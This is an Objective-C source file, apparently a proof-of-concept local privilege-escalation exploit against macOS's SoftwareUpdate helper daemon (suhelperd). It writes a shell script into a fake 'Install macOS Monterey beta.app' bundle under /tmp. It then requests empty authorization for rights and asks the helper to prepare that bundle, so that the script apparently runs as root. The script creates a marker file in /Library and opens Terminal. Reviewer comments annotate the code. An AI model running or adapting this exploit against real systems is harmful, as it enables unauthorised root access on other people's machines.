//
//  main.m
//  exploit_suhelperd
//
//  Created by mickey on 2022/1/21.
//

///  clang exploit.m -o /tmp/exploit -framework Foundation -fobjc-arc -fobjc-link-runtime /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/PrivateFrameworks/SoftwareUpdate.framework/Versions/A/SoftwareUpdate.tbd

#import <Foundation/Foundation.h>

/// Stand-in for the helper daemon's client protocol. It is deliberately left
/// empty: it exists only so that the SUHelperProxy declaration below can state
/// its conformance and compile. The real selectors are not reproduced here;
/// presumably they live in the SoftwareUpdate private framework that the clang
/// line in the header comment links against — not verifiable from this file.
@protocol SUHelperDProtocol
// some protocol methods
@end

/// Local redeclaration of SUHelperProxy so that the calls in main() type-check.
/// No @implementation appears in this file; the class is presumably resolved at
/// link time from the SoftwareUpdate .tbd named on the clang line in the header
/// comment — confirm against that library.
/// NOTE(review): the ivar block and the "@synthesize" trailer look like
/// class-dump output. The ivar list has to match the real class's layout
/// exactly; nothing in this file checks that.
@interface SUHelperProxy : NSObject <SUHelperDProtocol>
{
    // Instance layout only — none of these ivars is read or written in this file.
    unsigned int _suhelperd_port;
    unsigned int _client_port;
    long long _currentRights;
    NSObject<OS_dispatch_queue> *_q;
    NSObject<OS_dispatch_source> *clientPortDeadChecker;
    long long _recentRights;
}

/// Shared-instance accessor used by main(). Declared as `id` here, so the
/// compiler cannot verify that the returned object really is a SUHelperProxy.
+ (id)sharedHelperProxy;
@property long long recentRights; // @synthesize recentRights=_recentRights;
/// Called first from main() with the literal 4. What the rights value encodes
/// is not visible in this file.
- (void)authorizeWithEmptyAuthorizationForRights:(long long)arg1;
/// Called last from main() with a bundle path under /tmp. Per the comment at
/// the call site the call blocks until the helper's XPC reply arrives; the
/// caller discards the BOOL result.
- (BOOL) prepareInstallAssistantWithPath:(NSString *)arg1;
/// Queried once from main() and logged with %@. The returned object's concrete
/// type is not visible here.
- (id) installAssistantPreparationStatus;

@end

/// Entry point. Stages a shell script at a fixed path under /tmp, waits for a
/// keypress, then issues three calls to the shared SUHelperProxy.
/// The command-line arguments are not used.
int main(int argc, const char * argv[]) {
    // The staged script only drops a marker file and launches Terminal; it
    // appears to serve as the author's proof that the file was executed. The
    // /Library location of the marker suggests it is expected to run with
    // elevated privileges — not verifiable from this file.
    NSString *payloadScript =
        @"#!/bin/bash\ntouch /Library/test_root\n/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\n";
    NSString *scriptPath =
        @"/tmp/Applications/Install macOS Monterey beta.app/Contents/Frameworks/OSInstallerSetup.framework/Resources/osinstallersetupd";
    NSString *assistantBundlePath = @"/tmp/Applications/Install macOS Monterey beta.app";

    NSLog(@"preparing payload shell...");
    // NOTE(review): both the BOOL result and the error out-parameter are
    // discarded, so a failed write is not detected before the helper calls.
    [payloadScript writeToFile:scriptPath
                    atomically:YES
                      encoding:NSUTF8StringEncoding
                         error:nil];

    // fire the hole
    NSLog(@"all ready, press enter to fire the hole.");
    getchar();  // waits for input on stdin before touching the helper

    SUHelperProxy *proxy = [SUHelperProxy sharedHelperProxy];
    [proxy authorizeWithEmptyAuthorizationForRights:4];

    id preparationStatus = [proxy installAssistantPreparationStatus];
    NSLog(@"installAssistantPreparationStatus:%@", preparationStatus);
    // will hang inside, waiting for XPC response
    [proxy prepareInstallAssistantWithPath:assistantBundlePath];

    return 0;
}